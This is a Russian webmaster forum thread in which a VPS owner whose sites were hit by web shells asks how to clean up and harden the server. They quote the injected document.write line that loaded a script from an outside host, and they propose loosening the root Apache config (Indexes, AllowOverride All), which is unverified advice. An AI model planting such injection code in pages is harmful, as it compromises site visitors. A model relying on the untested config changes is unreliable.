- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Помогите проблема с безопасностью <!-- js-tools -->
Наш хостинг с меня хотит брать оплату по техподдержке, дожили до этого.
Вот что они пишут:
мы понимаем, что у вас проблема.
Видим, что сервер доступен по ssh, пинг есть, без потерь. Следовательно, проблема внутри вашего контейнера. Согласно регламенту (http://firstwiki.ru/index.php/Регламент_работы_службы_технической_поддержки) если вам нужна помощь наших специалистов, то вам необходимо заказать пакет поддержки.
root@m:~# ping XX.XX.XXX.XXX
PING XX.XX.XXX.XXX (XX.XX.XXX.XXX) 56(84) bytes of data.
64 bytes from XX.XX.XXX.XXX: icmp_req=1 ttl=61 time=0.747 ms
64 bytes from XX.XX.XXX.XXX: icmp_req=2 ttl=61 time=1.17 ms
64 bytes from XX.XX.XXX.XXX: icmp_req=3 ttl=61 time=2.28 ms
64 bytes from XX.XX.XXX.XXX: icmp_req=4 ttl=61 time=0.430 ms
64 bytes from XX.XX.XXX.XXX: icmp_req=5 ttl=61 time=0.515 ms
^C
--- XX.XX.XXX.XXX ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4001ms
rtt min/avg/max/mdev = 0.430/1.030/2.281/0.677 ms
IP здесь скрыл XX.XX.XXX.XXX по понятной причине.
Вчера чистил сайт от шелов, всё вычистил, но проблема может возникнуть снова.
Это было вчера:
<!-- js-tools -->
document.write('<script src="http://sait.ru/i/stat.php"></script>');
<!-- /js-tools -->
Я их спросил сегодня, чуток раньше, они это не захотели смотреть, указав на оплату:
И еще не работает правило:
<Files "xxxxxxxxxx.js">
Order Deny,Allow
Deny from all
</Files>
Видимо в главном конфиге Апача нет:
<Directory />
Options Indexes FollowSymLinks
AllowOverride All
Order deny,allow
Satisfy all
</Directory>
Что мне можно сделать самому???
Закрыть дыры, через которые льют шеллы
Закрыть дыры, через которые льют шеллы
Для этого и создал пост).
В соседней ветке написано: "3. все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает deny from all
либо запрещает вызов php"
Но у меня не срабатывает .htaccess поскольку нет доступа для настройки в апаче.
Права ли техподдержка, и что я сам смогу сделать еще?
Тихо... кто-то скажет должен я платить хостеру за эту настройку апача?
firstvds.ru вам предоставляет услугу VPS-хостинга. Вот VPS-контейнер вам дали, вся настройка внутри сервера - это уже ваши дела.
Вы можете настроить все сами (если умеете), можете заказать услуги стороннего админа, чтобы он вам все настроил, а можете оплатить работу саппорта firstvds.ru.
Бесплатно никто вам ничего не обязан настраивать, это не шаред.
У меня VDS-Отрыв. В каких папках-файлах лежат настройки сервера разобрался, например, знаю адреса файлов: php.ini, httpd.conf могу сам их отредактировать.
У меня другой вопрос будет.
1. Права изменил файла скрипта на 644.
2. Теперь хочу закрыть его, чтоб не был доступен, закинув в его папку .htaccess
<Files "slider-n.js">
Order Deny,Allow
Deny from all
</Files>
3. Чтоб сработал в этой папке .htaccess необходимо мне отредактировать файл httpd.conf
в нём сейчас так:
<Directory />
AllowOverride None
Order deny,allow
Deny from all
</Directory>
заменить на:
<Directory />
Options Indexes FollowSymLinks
AllowOverride All
Order deny,allow
Satisfy all
</Directory>
Тем самым закроется возможность внедрения в файл скрипта постороннего кода шела.
А теперь вопрос: правильна ли последовательность шагов и будет ли результат?
Поправьте если я неверно понимаю.
ТС почему вы мучаете конфиги сервера, а не хотите дыру с движке закрыть?
P.S. техподдержка правильно ответила, на ВПС администрированием занимается владелец, либо нанятый за отдельную админ.
У меня нет движка, самописные сайты. И я знаю какие именные файлы *.js у меня заражаются.
А еще, нашел в соседней теме и поставил права на папку 555.
от шеллов 555 не спасет, их вычистили ?
уверены что после того как закроете запись в .js, вам не начнут спамить в .php ??
Код я вычистил:
<!-- js-tools -->
document.write('<script src="http://sait.ru/i/stat.php"></script>');
<!-- /js-tools -->
а что-то подозрительное другое не нашел...
Скачан весь хостинг на комп, как еще искать подозрительные файлы?
Спамить в .php - не знаю может быть...
Пароли от FTP сверхдлинные, пароль стоит главный в тотале, думаю здесь нет утечки.
ай-болитом например